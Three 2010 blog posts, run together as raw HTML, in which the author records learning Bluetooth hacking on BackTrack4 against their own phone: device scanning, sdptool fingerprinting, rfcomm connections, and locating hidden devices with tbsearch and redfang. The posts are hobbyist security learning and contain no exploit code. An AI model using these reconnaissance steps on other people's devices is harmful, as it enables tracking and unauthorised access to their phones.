<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<div style="color: yellow;">SINGLE SCANS</div><div style="color: yellow;">=============</div><br />
With only 1 bluetooth interface installed, bluejay automatically chooses this interface,<br />
usually hci0, and starts the scan ;<br />
<br />
<span style="color: lime;">./bluejay -s</span><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bluejay-s-single.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bluejay-s-single.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
When starting a single scan with multiple interfaces installed, bluejay will prompt for an interface to<br />
be entered ; <br />
<br />
<div style="color: lime;">./bluejay -s<br />
hci2<br />
<div class="separator" style="clear: both; text-align: center;"> <a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bluejay-s-m.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bluejay-s-m.jpg" width="640" /></a></div></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<div style="color: yellow;">CONTINUOUS SCANS</div><span style="color: yellow;">==================</span><br />
<br />
With only 1 bluetooth interface installed, bluejay will automatically take the first one it finds,<br />
usually hci0, and start the scan.<br />
When quitting with Ctrl C, bluejay then prompts whether to save the scan results to log or not (y/n) <br />
<br />
If choosing not to save, number of found devices is printed to screen and program exits.<br />
<br />
<div style="color: lime;">./bluetooth -c</div>(followed by <span style="color: lime;">Ctrl C</span> and "<span style="color: lime;">n</span>" to <u>not </u>save results to log)<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bluejay-c-single-n.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bluejay-c-single-n.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
If you choose to save the scan results, then bluejay will print the number of devices discovered on screen and<br />
save the results to a logfile in /pentest/bluetooth/bluejay/ <br />
<br />
Saving the scan results to log ;<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bluejay-c-single-y.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bluejay-c-single-y.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
When starting continuous scans with multiple bluetooth interfaces installed,<br />
bluejay will prompt you to enter the bluetooth interface you want to scan with. <br />
<br />
<span style="color: lime;">./bluejay -c</span><br />
followed by entering interface <span style="color: lime;">hci1</span> in this case<br />
then Quitting with <span style="color: lime;">Ctrl C</span> and choosing <u>not </u>to save scan results "<span style="color: lime;">n</span>" <br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bluejay-c-m.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="355" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bluejay-c-m.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
I am lazy and got fed up with the typing in of the interface names..<br />
So if you just hit Enter where you are prompted to enter the interface to scan with, bluejay will<br />
automatically choose the first interface it finds (usually hci0) and start scanning with that.<br />
<br />
<div style="color: lime;">./bluejay -c</div><span style="color: lime;">Enter</span><br />
<span style="color: lime;"></span>Quit with <span style="color: lime;">Ctrl C</span> and "<span style="color: lime;">n</span>" to <u>not </u>save the scan results.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bluejay-c-m-1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bluejay-c-m-1.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Le Voilà !!<br />
The logging side of things is regretfully far from perfect;<br />
If clock offset changes, or if name is cached then the BDADDR will show up more than once in the log.<br />
Am working on a revision v0.3 which will hopefully sort a few things out. It was still a fun project though ;)<br />
<br />
I am sure there are loads of ways to make it smoother and quicker, comments with advice and on errors<br />
encountered when using it are appreciated.<br />
<br />
<br />
<br />
Despite the fact that I have more or less given up hope on been able to have the same amount of fun with<br />
bluetooth as can be had with wireless, it is an interesting area to look at and I would appreciate any comments<br />
which may assist with bluetooth hacking.Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-8356530514965708840.post-6578062609939520042010-09-08T23:27:00.005+02:002010-09-09T13:13:17.370+02:00Bluetooth mayhem -- part IIIn the previous post all kinds of methods have been shown to get hold of the all-important bdaddr or MAC address of the bluetooth devices, so here I am assuming that you have, or know how to obtain, the bdaddr of your test device.<br />
<br />
After all the scanning is complete and I have found my test subject... what next ?<br />
Well, as always, get more information !<br />
<br />
We can get further information on the device's services and channels by fingerprinting with sdptool;<br />
<div style="color: lime;">sdptool -i hci0 browse 6C:9B:02:FF:97:2F</div>Hectic amount of output there... so what do we actually need ?<br />
From what I have read, we want to get the Service Name, the Service RecHandle and the Channel.<br />
<br />
So to simplify the output to get what we want, I will use grep -e (egrep) to make it a little more readable ;<br />
<div style="color: lime;">sdptool -i hci0 browse 6C:9B:02:FF:97:2F | egrep 'Service Name|Service RecHandle|Channel'</div><div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/snapshot07-1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/snapshot07-1.jpg" width="640" /></a></div><br />
<br />
<br />
So at this stage we have the bdaddr of the test device and a list of services and channels which we will use when we prepare for a connection.<br />
<br />
Next step is preparing a connection with the device, but first some more preparation;<br />
<br />
<div style="color: #38761d;">Editing main.conf</div><div style="color: black;"><span style="color: #38761d;">===============</span>=</div><span style="color: lime;">nano /etc/bluetooth/main.conf</span><br />
Edit the line under <b>Default device class</b> to the class you want, in this case I am doing cell phone.<br />
<div style="color: yellow;">Class = 0x500204</div>No need to edit anything else.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/main-conf.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/main-conf.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<div style="color: #38761d;">Editing rfcomm.conf<br />
================== </div><div style="color: lime;">nano /etc/bluetooth/rfcomm.conf</div><br />
Edit the rfcomm.conf; enable binding, enter bdaddr of the device you want to connect to, enter channel number of the service you want to access, enter the name of the connection.<br />
Delete the hashes where necessary in the original rfcomm.conf file and finally the file should look something<br />
like the below; <br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/rfcomm-conf.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/rfcomm-conf.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<div style="color: #38761d;"></div><div style="color: #38761d;">Editing file permissions</div><div style="color: #38761d;">====================</div>Edit the permissions of below files in /etc/bluetooth/;<br />
<div style="color: lime;">cd /etc/bluetooth/</div><div style="color: lime;">chmod 755 {main.conf,networking.conf,rfcomm.conf}</div><br />
<i>Not sure that editing the main.conf, rfcomm.conf and setting the file permissions is absolutely necessary, as you can set the device class in hciconfig and can enter the rfcomm information directly in the command line... </i><br />
<i>But if you can't tell by now... I'm flying as blind as a deaf bat with this ;)</i><br />
<br />
Best to then restart bluetooth service ;<br />
<div style="color: lime;">/etc/init.d/bluetooth restart</div><br />
<br />
<div style="color: #38761d;">Configuring your bluetooth interface with hciconfig</div><div style="color: #38761d;">Reference: <a href="http://linux.die.net/man/8/hciconfig">http://linux.die.net/man/8/hciconfig </a></div><div style="color: #38761d;"><a href="http://www.blogger.com/post-edit.g?blogID=8356530514965708840&postID=657806260993952004"> </a>===========================================</div><div style="color: lime;">hciconfig -a hci0 up</div><i>Opens and initializes the HCI device</i><br />
<span style="color: lime;">hciconfig -a hci0 class 0x500204</span><br />
<i>Sets the device's class (0x500204 is for Cell Phone)</i><br />
<div style="color: lime;">hciconfig -a hci0 lm accept, master;</div><i>Sets link mode to accept baseband connection and</i><br />
<i>also to ask to become master when connection request comes in.</i><br />
<div style="color: lime;">hciconfig -a hci0 lp rswitch,hold,sniff,park;</div><i>Sets the link policies.</i><br />
<span style="color: lime;">hciconfig -a hci0 name TEST</span><br />
<i>Sets the name of your bluetooth device</i><br />
<br />
There are various posts on which settings should be enabled, some also mention ;<br />
<div style="color: lime;">hciconfig -a hci0 auth enable </div><div style="color: lime;">hciconfig -a hci0 encrypt enable</div><i>This however interfered with sdptool's capability to scan devices for info due to an invalid exchange.</i><br />
<i>(I assume the due to the device then being set to security mode 3: link level enforced security) </i><br />
<i><a href="http://www.palowireless.com/bluearticles/cc1_security1.asp">http://www.palowireless.com/bluearticles/cc1_security1.asp</a></i><br />
<br />
<br />
<div style="color: #38761d;">Updating the Service Discovery Protocol Database</div><div style="color: #38761d;">Reference: <a href="http://linux.die.net/man/1/sdptool">http://linux.die.net/man/1/sdptool</a></div><div style="color: #38761d;">==========================================</div>For instance; <br />
<div style="color: lime;">sdptool -i hci0 add --handle=0x10001 --channel=9 OPUSH</div><div style="color: lime;">sdptool -i hci0 add --handle=0x10002 --channel=10 FTP</div><div style="color: lime;">sdptool -i hci0 add --handle=0x10003 --channel=1 DUN</div><br />
The handles and channels for the services may be different for other phones so check all info with sdptool.<br />
<br />
<br />
OK, so now that's all done, what am I able to do ?<br />
Well, not so much actually.<br />
<br />
It turns out that the above configurations haven't helped me in connections, however knowing the processes is always a good thing ;) and might as well document it !<br />
<br />
<br />
In all connection attempts, I needed to Accept the connection on the cell phone.<br />
<br />
<div style="color: #38761d;">Connecting with rfcomm</div><div style="color: #38761d;">References: <a href="http://linux.die.net/man/1/rfcomm">http://linux.die.net/man/1/rfcomm</a></div><div style="color: #38761d;"><a href="http://www.palowireless.com/infotooth/tutorial/rfcomm.asp">http://www.palowireless.com/infotooth/tutorial/rfcomm.asp</a></div><div style="color: #38761d;">=======================================</div>First to try a connection to the OPUSH service which on my cell is on Channel 9.<br />
As all the information has been entered for this in <span style="color: yellow;">rfcomm.conf</span> I can enter ;<br />
<div style="color: lime;">rfcomm bind 0</div><div style="color: lime;">rfcomm</div><div style="color: lime;">rfcomm connect 0</div>If the <i>address already in use</i> error comes up, then release the device or all devices;<br />
<span style="color: lime;">rfcomm release hci0</span> or <span style="color: lime;">rfcomm release all</span> and try again.<br />
<br />
I have to <b>accept</b> on cell phone to receive data from 'TEST' <i>(name given to bluetooth interface)</i> and then connection is made.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/snapshot06-1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="252" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/snapshot06-1.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
Its probably better practice though to enter the full code in the command line;<br />
<div style="color: lime;">rfcomm bind 0 6C:9B:02:FF:97:2F 9</div><div style="color: lime;">rfcomm</div><div style="color: lime;">rfcomm connect 0 6C:9B:02:FF:97:2F 9</div><i>(I am still obliged to accept data on the cell phone)</i><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/rfcomm-c9.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="252" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/rfcomm-c9.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
The rfcomm connection attempt fails for most services as there are no means I can find included in BackTrack4, to reply to the PIN request from the phone.<br />
<br />
<i><b>To check & verify on the PIN request response issue;</b></i><br />
<i><b><a href="http://www.linuxquestions.org/questions/slackware-14/slackware-13-bluetooth-pan-759274/">http://www.linuxquestions.org/questions/slackware-14/slackware-13-bluetooth-pan-759274/</a></b></i><br />
<br />
After much googling and reading I found a reference to using <b>simple-agent</b> which is included in Bluez-4.32 package.<br />
I just extracted that file (from the 'test' subfolder) and copying the file simple-agent to for instance /etc/bluetooth/ and running it, it returns <b>Agent registered</b>.<br />
<br />
When trying to connect with rfcomm to a service prompts a PIN request from the device, such as the below example for OBEX File Transfer, simple-agent returns with <b>RequestPinCode</b> along with the bdaddr where the request came from and prompts for a PIN.<br />
<br />
Enter the PIN that was entered in the device (in this case 0000) and pairing is succesful.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/snapshot03-1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="252" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/snapshot03-1.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Yay ! Connected !<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/rfcomm-c10.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="252" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/rfcomm-c10.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
So what have I actually accomplished with all the above ?<br />
Well, it feels like not very much at all, but at least I am a step closer to understanding the connection methods involved.<br />
<br />
With a lot, probably a helluva lot, more time on google and various fora, I hope to be able to learn a bit more about bluetooth hacking.<br />
<br />
This truly is a slow process ;)<br />
<br />
As always, any insightful comments which may help enable the various bluetooth tools in BackTrack4 greatly appreciated.<br />
<br />
<b><i>On to part III ? ! </i></b>Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-8356530514965708840.post-674876418487143172010-09-06T14:00:00.018+02:002010-09-12T13:20:51.790+02:00Bluetooth mayhem<div class="separator" style="clear: both; text-align: center;"></div><br />
So this is going to be a post which will probably be either updated when possible or deleted<br />
depending on the progress I am able to make with bluetooth ;) <br />
<br />
After getting interested in bluetooth again, I came to the conclusion that I really can't get much done at all..<br />
Considering the amount of cash I have spent in the past on wireless adapters to test, getting a pre-paid mobile and a couple of bluetooth dongles and headsets to go crazy on didn't really seem like a bad idea.<br />
<br />
So this will be a post containing some information on the bluetooth side of things that that I have been able to get through, which as it stands right now is horrifically little :| <br />
<br />
The bluetooth tools included on BackTrack4 are all somewhat dated and their functionality with BackTrack4 not well documented, though bluetooth still forms a part of many wireless security courses, so I have a feeling it is simply a lack of documentation.<br />
<br />
The phone I am using to test on is a Nokia 2720 with bluetooth visibility set to permanently visible (except with the tests of tbsearch & fang)<br />
I have a couple of usb dongles, 2x Class 2 and 1x Class 1.<br />
<br />
<br />
<div style="color: yellow;">SCANNING FOR -AND LOGGING BLUETOOTH DEVICES</div><span style="color: yellow;">=============================================</span><br />
<br />
First to ensure that the bluetooth devices are up and running ;<br />
<br />
<div style="color: lime;">hciconfig</div><span style="color: lime;">hciconfig hci0 up</span> <-- in my case an internal bluetooth device<br />
<span style="color: lime;">hciconfig hci1 up</span> <-- in my case an external USB dongle<br />
etc.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/hciconfig.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="355" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/hciconfig.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Getting more info on the bluetooth interface ;<br />
<div style="color: lime;">hciconfig hci0 -a</div><div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/hciconfig-a.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"></a><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/hciconfig-a.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/hciconfig-a.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
There are numerous methods to scan for devices ;<br />
<br />
<div style="color: yellow;"><b>hcitool</b></div><div style="color: yellow;"><b>---------</b></div>hcitool is the most straightforward, comparable with using the iwlist scan option when checking for wireless.<br />
<div style="color: lime;">hcitool dev</div><div style="color: lime;">hcitool -i hci0 scan </div><span style="color: lime;">hcitool -i hci0 inq</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/hcitool.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/hcitool.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Alternatively you can use one of the many monitoring tools included in BT4 such as ;<br />
BlueScan, Btscanner, ghettotooth, tbear <br />
<br />
<br />
<div style="color: yellow;"><b>BlueScan</b></div><div style="color: yellow;"><b>------------</b></div>BlueScan will show bdaddr of the device found along with name, manufacturer, active services and active channels along with time of discovery.<br />
However have not figured out how to specify which interface to use; BlueScan always seems to want to use bdaddr of hci0.<br />
After stopping the scan with Ctrl +C you are given 3 options;<br />
1. Print to screen<br />
2. Export results to log<br />
3. Quit<br />
<br />
<div style="color: lime;">cd /pentest/bluetooth/bluescan/</div><span style="color: lime;">./bluescan</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/BlueScan.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/BlueScan.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<div style="color: yellow;"><b><br />
</b></div><div style="color: yellow;"><b>Btscanner</b></div><div style="color: yellow;"><b>------------- </b></div>Btscanner uses all available bluetooth interfaces for scanning.<br />
It opens an GUI and works similar to the oldschool Kismet, listing found bluetooth devices with the possibility to show further information on the devices when selected.<br />
<span style="color: yellow;">i</span> <-- starts an inquiry scan<br />
<span style="color: yellow;">Enter</span> <-- gives further info on the device selected<br />
<span style="color: yellow;">a</span> <-- aborts the scan<br />
<span style="color: yellow;">Q</span> <-- Quits the program<br />
Results for the devices found are logged automatically with a directory created per bdaddr found.<br />
For scanning for devices, I would say that so far as I have seen, this tool is the one to use.<br />
<u><i>edit</i></u><br />
<i>I have come to the conclusion that I am not fond of the way btscanner ; </i><br />
<i>> Does not enable the choosing of individual interface adapters. </i><br />
<i>> Logs all the information in separate folders, it makes sense in view of the information included, but it makes it harder to quickly view a list of bdaddr's, Names, Class etc.once programme quits.</i><br />
<i><br />
</i><br />
<span style="color: lime;">btscanner</span><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/Btscanner1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/Btscanner1.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Further info after selecting the found device;<br />
(<span style="color: yellow;">q</span> to return to main menu)<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/Btscanner2.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/Btscanner2.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<div style="color: yellow;"><b>ghettotooth</b></div><div style="color: yellow;"><b>--------------- </b></div>ghettotooth simply lists the bdaddr's and names of the devices found.<br />
A log is made each time ghettotooth is started.<br />
<br />
<div style="color: lime;">cd /pentest/bluetooth/ghettotooth/</div><div style="color: lime;">perl ghettotooth.pl -h </div><div style="color: lime;">perl ghettotooth.pl hci0</div><div style="color: lime;">ls </div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ghettotooth.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ghettotooth.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<div style="color: yellow;"><b></b></div><div style="color: yellow;"><b>T-bear</b></div><div style="color: yellow;"><b>---------</b></div>A straightforward bluetooth device locator with options to log the results.<br />
Whichever interface is entered to use, the screen shows hci0 as being in use after a few seconds<br />
which is a bit confusing.<br />
<u><i>edit</i></u><br />
<i>Well after having played a bit more with them, I have decided that I like tbear the best for quick scans. </i><br />
<i>The reason is that you can choose which interface adapter to use (even though it doesnt correctly mention that on screen) and it is easy to view a quick list of what was found from the logs after quitting the programme. Plus it looks pretty ;)</i><br />
<br />
<div style="color: lime;">cd /pentest/bluetooth/tbear/</div><div style="color: lime;">./tbear -h </div><div style="color: lime;"></div><div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/tbear1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/tbear1.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<span style="color: lime;">./tbear -i hci0 -l log</span><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/tbear2.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/tbear2.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
From what I have read, Tbear did originally come with a load of other tools (http://www.secguru.com/link/tbear_bluetooth_environment_auditing), but in BT4 there are just two other tools with tbear;<br />
<b><span style="color: yellow;">tanya</span></b> & <b><span style="color: yellow;">tbsearch</span></b><br />
<br />
<b style="color: yellow;">tanya </b>is a DoS tool for bluetooth, however haven't yet played enough with it to get it to work.<br />
<i>I would love to think that the author had a wife / GF called Tanya whose constant rattling reminded him of a DoS..</i><br />
<br />
<b style="color: yellow;">tbsearch </b>is a tool to search for hidden bluetooth devices by checking bluetooth addresses and able to use multiple threads (multiple bluetooth interfaces)<br />
So for instance if you know a device should be in the area and you have the bdaddr or a possible range you can search for it and tbsearch will find it, even if it is in hidden mode, and continue searching for others.<br />
Its not a fast process however..<br />
<div style="color: lime;">cd /pentest/bluetooth/tbear/</div><div style="color: lime;">./tbsearch</div><div style="color: lime;">./tbsearch -b 6C:9B:02:FF:97:2F hci0 </div>(bluetooth on mobile set to 'hidden')<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/tbsearch-b1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/tbsearch-b1.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
This process can be sped up a bit using multiple dongles, below I have a total of 4 devices checking it all out with a starting point 7 digits before the bdaddr, but as you can see it came back with a false positive..<br />
(30 instead of 2f)<br />
This happened more or less consistently when using multiple interfaces, checking for individual bdaddr's seems to work better when using a single interface with tbsearch.<br />
<br />
<span style="color: lime;">./tbsearch -b 6C:9B:02:FF:97:29 hci0 hci1 hci2 hci3</span> <br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/tbsearch-b2.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/tbsearch-b2.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<div style="color: yellow;"><b>redfang</b></div><div style="color: yellow;"><b>----------</b></div>fang checks for 'hidden' bluetooth devices by scanning a range of bluetooth addresses similar to the above tbsearch but somewhat more refined and expanded.<br />
fang appears to work better than tbsearch in detecting hidden devices using multuiple interfaces.<br />
<br />
<div style="color: lime;">cd /pentest/bluetooth/redfang/</div><div style="color: lime;">./fang -h</div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/fang-h.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/fang-h.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
The below example is only testing the last 2 digits of the bdaddr of my test phone (set to hidden) using 4 bluetooth interfaces as above with tbsearch.<br />
<span style="color: lime;">./fang -r 6C9B02FF9700-6C9B02FF973F -n 4</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/fang-r.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/fang-r.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
A word of warning, bluetooth and WiFi both use part of the 2.4 GHz band .. carrying out this attack with this many dongles basically caused my wireless network to suffer considerably.. <br />
<br />
<br />
<br />
<br />
This is the easy stuff, now there is a whole lot more to get my head around, but hopefully the motivation will continue to flow as I have to say, for the moment bluetooth feels a bit like ; <br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/omgwtf-1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="299" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/omgwtf-1.jpg" width="320" /></a></div><br />
<br />
<br />
<br />
<br />
Some reference material ;<br />
<br />
http://www.backtrack-linux.org/forums/backtrack-howtos/2583-dr_greens-bluesnarfer-bluebugger-guides-old-fourm.html<br />
http://www.sans.edu/resources/securitylab/bluetooth.php<br />
<br />
